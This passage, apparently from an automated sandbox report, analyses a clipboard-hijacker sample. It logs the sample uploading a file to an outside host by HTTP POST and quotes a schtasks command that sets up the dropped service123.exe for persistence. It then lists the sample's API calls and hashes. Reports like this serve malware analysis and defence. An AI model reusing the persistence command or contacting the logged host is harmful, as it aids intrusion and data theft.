Sep 29, 2024 01:02:41.137902021 CEST	2472	OUT	Data Raw: d7 27 c1 2b d6 be 3f c9 56 52 52 b5 a0 61 ba cd 87 31 ea 3f d2 11 43 28 ea 6d 41 33 d6 72 57 92 95 6e ca 81 cd 45 ed 98 2c 57 46 23 31 e1 1f b5 c8 be 29 e6 a2 ae e9 4c eb 67 c5 1e 1a b8 ca 6c af 56 58 af 3e ec 21 8b 53 18 d0 88 3b 5e c7 83 1f ea Data Ascii: '+?VRRa1?C(mA3rWnE,WF#1)LglVX>!S;^\Y^F@k5f}?RjPr-=DP5X,rIh?Kc;=ob_[W"6h.E6"IiLI*-]xDXw6-'xk^D
Sep 29, 2024 01:02:41.137924910 CEST	1236	OUT	Data Raw: 15 61 ba 74 da 73 28 8a b1 ea a8 91 1d d9 ae 90 af ac 16 17 31 2e a1 b5 de cf e0 55 d4 7f d8 5a 8a af b2 0d a0 d1 f5 38 72 99 21 0c b5 1c 11 d6 ff 4b 1c 74 2b 5c 7c 19 de 15 c1 1d a4 89 c2 30 73 4f b6 3c ff 2a a2 24 3a 88 71 bc 96 89 b3 b5 a8 bc Data Ascii: ats(1.UZ8r!Kt+\\|0sO<$:q:a@^[-Zy]1:HoF+ {bRXH-_:n>xZ;hV{A9S_PN+7[!K1[3+(dQB3)Ok
Sep 29, 2024 01:02:42.053395987 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 23:02:41 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49712	37.9.4.189	80	7680	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 29, 2024 01:02:45.210664988 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary86278020 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 30040 Host: sevtvh17pt.top
Sep 29, 2024 01:02:45.210787058 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 36 32 37 38 30 32 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 75 68 Data Ascii: ------Boundary86278020Content-Disposition: form-data; name="file"; filename="Buhejaco.bin"Content-Type: application/octet-streamfHciFGX;6V /%n[Av[[ 3US!Y<" +J)y8M>
Sep 29, 2024 01:02:45.215585947 CEST	3708	OUT	Data Raw: b6 e1 ec 46 04 ff 08 53 d8 d2 58 40 a3 59 39 38 cd 6f 77 3f 31 09 1f bf 6e 3f be 3f 4a fd 1e e4 51 39 18 bc 38 31 1f 4c f9 66 2c 58 4c b4 29 df d4 35 20 d8 8a bb 2b ad 98 e2 73 9e 03 f3 34 1a b5 ee 7b 15 9a cd c8 5f df 85 c3 2f 28 d3 8e aa 9b 1e Data Ascii: FSX@Y98ow?1n??JQ981Lf,XL)5 +s4{_/(=.@Z\+9dW!jL~4ySmGqWv.}<)'GjCB__N?6j\_%B}n+QFK~\|y'K#wxiM}/P#V$Hr#ix#Fup1
Sep 29, 2024 01:02:45.215677977 CEST	4944	OUT	Data Raw: 53 71 60 6e 96 dd c4 5b 1a 20 60 44 8a fa 83 35 9d ac 16 d5 6b 1f 2f 1e fd c9 6e 59 d4 9d 61 2a b0 73 0e b0 23 46 26 1d ef 0f 0d e9 3b b8 56 3b cf 65 2f 3e 60 79 60 22 85 2e 5e 4c 21 e5 04 a7 57 81 fa ca e9 f5 5d b9 f7 df 98 2a a3 a8 f8 05 c1 d8 Data Ascii: Sq`n[ `D5k/nYas#F&;V;e/>`y`".^L!W]~Dh6vl<%,W2G^0u`1E8qdwWf1#[[-,}rk}UG6m8Fo_kP_dD@^)]z)o*p-JFf
Sep 29, 2024 01:02:45.215739012 CEST	9888	OUT	Data Raw: fe fb 15 4f c4 06 b3 e5 7c 9a 5c 60 c0 a5 d0 f8 6c d3 4b f5 5a 84 32 0e 87 91 91 e0 5e bd 50 9c 8a ce e9 d9 af 36 81 0e 6c a2 7f b8 66 07 77 12 ec 54 5f 0c 3e 54 be 8e c4 b5 ed f9 8d 2c ee 4c 0e fb 0f 53 e5 06 8f 8b a6 b3 1b 9f c2 6f 2d 6e cd 2f Data Ascii: O\|\`lKZ2^P6lfwT_>T,LSo-n/<wet \|gV/Oyuz(yL.RPXvXtyX6!\|(qh%8P?,2DMg\89N<Jv9*PJ8a0v" Ed^A]0;0(
Sep 29, 2024 01:02:45.215783119 CEST	376	OUT	Data Raw: bd 45 b6 9d 9b 17 b0 ef 21 79 f2 eb 5d 40 ec c5 54 2a a6 9d e3 a9 de 92 4a 3b 62 90 94 d8 a1 b7 ae 84 56 9b 6b 2b d8 44 75 d2 d7 0a e7 02 35 2a 43 a5 73 8c 30 6f 2c 1b db ed ad d1 b1 95 a2 88 e4 c5 cc cc bd 4f 7f da 64 1e bd 5a 45 87 71 56 13 6d Data Ascii: E!y]@TJ;bVk+Du5Cs0o,OdZEqVm9V~C,)a36;H['<u!w5[KLS#NT/I6V,77 x3A:;aj30S=2i/?
Sep 29, 2024 01:02:46.011080027 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sat, 28 Sep 2024 23:02:45 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	19:02:27
Start date:	28/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7f0000
File size:	9'994'752 bytes
MD5 hash:	0603207308448AD82DC3D1FC17923DDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.1899287053.000000000434C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	19:03:27
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x790000
File size:	314'617'856 bytes
MD5 hash:	4D55689820C303548CBA9CFA9F2BF3CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	19:03:28
Start date:	28/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x430000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	19:03:28
Start date:	28/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	19:03:30
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x790000
File size:	314'617'856 bytes
MD5 hash:	4D55689820C303548CBA9CFA9F2BF3CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	19:04:02
Start date:	28/09/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x790000
File size:	314'617'856 bytes
MD5 hash:	4D55689820C303548CBA9CFA9F2BF3CB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50.4%
Total number of Nodes:	125
Total number of Limit Nodes:	4

Executed Functions

Function 0079116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 007911B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00791238
__p__acmdln.MSVCRT ref: 00791261
malloc.MSVCRT ref: 007912EB
strlen.MSVCRT ref: 00791323
malloc.MSVCRT ref: 0079132E
memcpy.MSVCRT ref: 00791344
GetStartupInfoA.KERNEL32 ref: 00791433

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 0b674ed3d68d3341c477411cbb51e2f49060930e203a148052f45e2796a1a258
Instruction ID: e09d8a5a9cff4ee99f22b261fc81e6edd77ab4ee86146cd8d06130c30b47369c
Opcode Fuzzy Hash: 0b674ed3d68d3341c477411cbb51e2f49060930e203a148052f45e2796a1a258
Instruction Fuzzy Hash: 33817B71A04206CFDF20EF68F98536977F1FB45300F80852AD9859B311E77DA82ACB86

Function 007915B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 007915CD
_exit.MSVCRT ref: 0079161A
_write.MSVCRT ref: 0079166A
_close.MSVCRT ref: 00791679

Strings

CONOUT$, xrefs: 007915C6
@, xrefs: 00798341
terminated, xrefs: 00791640

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: fcfe65ca68326e3012da778102365793a00f326a7638b3c3ed8743bd36c27172
Instruction ID: 7dfea305a6a00374c2136f9842eceac0685c1813accacfc1e0a14d783877d5b2
Opcode Fuzzy Hash: fcfe65ca68326e3012da778102365793a00f326a7638b3c3ed8743bd36c27172
Instruction Fuzzy Hash: 834159B09083059FDB10EF79E84966EBBF4AB85314F40892DE898D7350EB3CD815CB56

Function 6C9D14B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C9D14CD
_exit.MSVCRT ref: 6C9D151A
_write.MSVCRT ref: 6C9D156A
_close.MSVCRT ref: 6C9D1579

Strings

CONOUT$, xrefs: 6C9D14C6
@, xrefs: 6CAA4AB1
terminated, xrefs: 6C9D1540

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 944a289b8d51d74fea8449c51e0003a7c113de9f99dd608f2c7b14cf32aa8da0
Instruction ID: 9c5ebfb3ca22696350a1c07912e1bdd7f7fb9c3e1ee9b1a1dd3d2fbc6db82470
Opcode Fuzzy Hash: 944a289b8d51d74fea8449c51e0003a7c113de9f99dd608f2c7b14cf32aa8da0
Instruction Fuzzy Hash: 84416AB19087059FDB00DFB9C44469EBBF4AF49318F05CA2DE8A5E7640E734D446CB56

Function 6C9E9C22 Relevance: 15.1, APIs: 10, Instructions: 110
sleepclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C9E9EB0: GetClipboardSequenceNumber.USER32 ref: 6C9E9EBE

Sleep.KERNELBASE ref: 6C9E9BFF
GetClipboardSequenceNumber.USER32 ref: 6C9E9C08

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: ClipboardNumberSequence$Sleep
String ID:
API String ID: 2948009381-0
Opcode ID: 6d3e3c74984a0510a4dfd7f9f14ab51320b5b2dbce7585f441438c66836debcf
Instruction ID: acb1ce349a27c5e2733bc089d8275cadd223a598a1deda404f2c367462d4954c
Opcode Fuzzy Hash: 6d3e3c74984a0510a4dfd7f9f14ab51320b5b2dbce7585f441438c66836debcf
Instruction Fuzzy Hash: 8E41D7B05083068EDB05FF74D6885AEBBF4AF65208F41492DE89687A44EB34D54ECB53

Function 007981E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0079138E,?,?,00006EA2,0079138E), ref: 00798271
GetProcAddress.KERNEL32 ref: 0079828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0079138E,?,?,00006EA2,0079138E), ref: 0079829D

Strings

UPkKFKdthiXpNLvpZVjK, xrefs: 0079827E
LYgbAXPoWKdcsgBzKdcsgBzdWtH.dll, xrefs: 0079824A
Failed to get function address. Error code: %d, xrefs: 007982E0

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$LYgbAXPoWKdcsgBzKdcsgBzdWtH.dll$UPkKFKdthiXpNLvpZVjK
API String ID: 145871493-1169698779
Opcode ID: 12254a2732c36aaa9395ada586507f5961a9c219080e129cfe59aa08e23d1665
Instruction ID: e69efc23c4e4e24569aaeb55500cd951f388f293013bc63b3d1acf2ad0b95645
Opcode Fuzzy Hash: 12254a2732c36aaa9395ada586507f5961a9c219080e129cfe59aa08e23d1665
Instruction Fuzzy Hash: 39318E72809600EFDB00EF78ED4955EBBF4FB4A300F108929E54583210EA7DD946CB97

Function 00798230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0079138E,?,?,00006EA2,0079138E), ref: 00798271
GetProcAddress.KERNEL32 ref: 0079828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0079138E,?,?,00006EA2,0079138E), ref: 0079829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0079138E,?,?,00006EA2,0079138E), ref: 007982BD
GetLastError.KERNEL32 ref: 007982DA
FreeLibrary.KERNEL32 ref: 007982F3

Strings

UPkKFKdthiXpNLvpZVjK, xrefs: 0079827E
Failed to load DLL. Error code: %d, xrefs: 007982C3
LYgbAXPoWKdcsgBzKdcsgBzdWtH.dll, xrefs: 0079824A

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$LYgbAXPoWKdcsgBzKdcsgBzdWtH.dll$UPkKFKdthiXpNLvpZVjK
API String ID: 1397630947-857934340
Opcode ID: 7459ffec6e41ea34a3e48e6ebaae9cabacad489e1a1a92dc6608b04186c787e0
Instruction ID: 8ab4118110aa21d9a6823099a10b47050d7f56356192e211ef36a407074e163b
Opcode Fuzzy Hash: 7459ffec6e41ea34a3e48e6ebaae9cabacad489e1a1a92dc6608b04186c787e0
Instruction Fuzzy Hash: A311E172905604EBDF00AFB8FD4A55E7BA0FB46300F108539D41587251FF3ED9128A87

Function 007913C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00791238
__p__acmdln.MSVCRT ref: 00791261
malloc.MSVCRT ref: 007912EB
strlen.MSVCRT ref: 00791323
malloc.MSVCRT ref: 0079132E
memcpy.MSVCRT ref: 00791344
_amsg_exit.MSVCRT ref: 007913EA
_initterm.MSVCRT ref: 0079140C

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 29c37e2cff72c0934796710df99cf9725c484f79d0ea29c1aef91b804ba36991
Instruction ID: 8fec1e795eaa222b07f06ee472fb8d98170bd7462c90eb09e502d8eddae69a12
Opcode Fuzzy Hash: 29c37e2cff72c0934796710df99cf9725c484f79d0ea29c1aef91b804ba36991
Instruction Fuzzy Hash: 1841E6B0A04306CBDF60EF68E98535DBBF1BB45300F50852ED98597311E77C9866CB46

Function 007911A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 007911B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00791238
__p__acmdln.MSVCRT ref: 00791261
malloc.MSVCRT ref: 007912EB
strlen.MSVCRT ref: 00791323
malloc.MSVCRT ref: 0079132E
memcpy.MSVCRT ref: 00791344
_amsg_exit.MSVCRT ref: 007913EA
_initterm.MSVCRT ref: 0079140C

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: da896f89ccc87bd649d50fdcdafcf49f1728dc4fa3bd9f525691f24be4de7bbd
Instruction ID: b8ff80d080b977e92b87dcb724bc5667687cea9cb54d14b1ddebb059f2a08802
Opcode Fuzzy Hash: da896f89ccc87bd649d50fdcdafcf49f1728dc4fa3bd9f525691f24be4de7bbd
Instruction Fuzzy Hash: 5F4108B0A043068FDF20EF68E98475DB7F0BB49340F50852ED9859B360E7789866CB96

Function 00791160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 007911B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00791238
__p__acmdln.MSVCRT ref: 00791261
malloc.MSVCRT ref: 007912EB
strlen.MSVCRT ref: 00791323
malloc.MSVCRT ref: 0079132E
memcpy.MSVCRT ref: 00791344
GetStartupInfoA.KERNEL32 ref: 00791433

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 9f79e674c8810dab504da4ac70fa0c42f34538db62ca7f9b23d48bcfc6334c2a
Instruction ID: 968d365072dfa4cf12d6aa2b50a453798c706bd7357fdf78f79ba10ef049e286
Opcode Fuzzy Hash: 9f79e674c8810dab504da4ac70fa0c42f34538db62ca7f9b23d48bcfc6334c2a
Instruction Fuzzy Hash: 71514C71A043068FDF20DF68E98475AB7F0FB49340F50852ED9459B320E738AC26CB86

Function 6C9E9B70 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6C9E9B99
CreateMutexA.KERNELBASE ref: 6C9E9BE3
Sleep.KERNELBASE ref: 6C9E9BFF
GetClipboardSequenceNumber.USER32 ref: 6C9E9C08

Strings

UQUngpFpdOyYhxpyvlKC, xrefs: 6C9E9B82, 6C9E9BCC

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Mutex$ClipboardCreateNumberOpenSequenceSleep
String ID: UQUngpFpdOyYhxpyvlKC
API String ID: 3689039344-2438371517
Opcode ID: 23874dcf00e2cd5a3f7b2c432da218d98181ca3053877972a146eafc8ccd22bf
Instruction ID: 7955ced5d7271c20c14eaacaf5c093fa3040ea2fc3fe4696929ff73d9b32a64c
Opcode Fuzzy Hash: 23874dcf00e2cd5a3f7b2c432da218d98181ca3053877972a146eafc8ccd22bf
Instruction Fuzzy Hash: FC01D2B15083069FCB04EFB8D64979BBFF8AF55344F01881CE89893640E775A48ACB92

Function 00791296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 007912EB
strlen.MSVCRT ref: 00791323
malloc.MSVCRT ref: 0079132E
memcpy.MSVCRT ref: 00791344

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 011da9028fba715b1cd947592db37a7d7c3e9f23ce210821c91e22c347d1288b
Instruction ID: 03764bf5620899aff330043c06d3a07593df34f4e0927963f9f7e6d6075c90da
Opcode Fuzzy Hash: 011da9028fba715b1cd947592db37a7d7c3e9f23ce210821c91e22c347d1288b
Instruction Fuzzy Hash: 94311575A04316CFCF20DF68E984369BBF1BB49300F45852EDA4897311E739A916CF85

Function 007913BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 007912EB
strlen.MSVCRT ref: 00791323
malloc.MSVCRT ref: 0079132E
memcpy.MSVCRT ref: 00791344

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 6c8c179285eb62613862f2139e5e1d494b14a5af78a071e9033ac637997f7d50
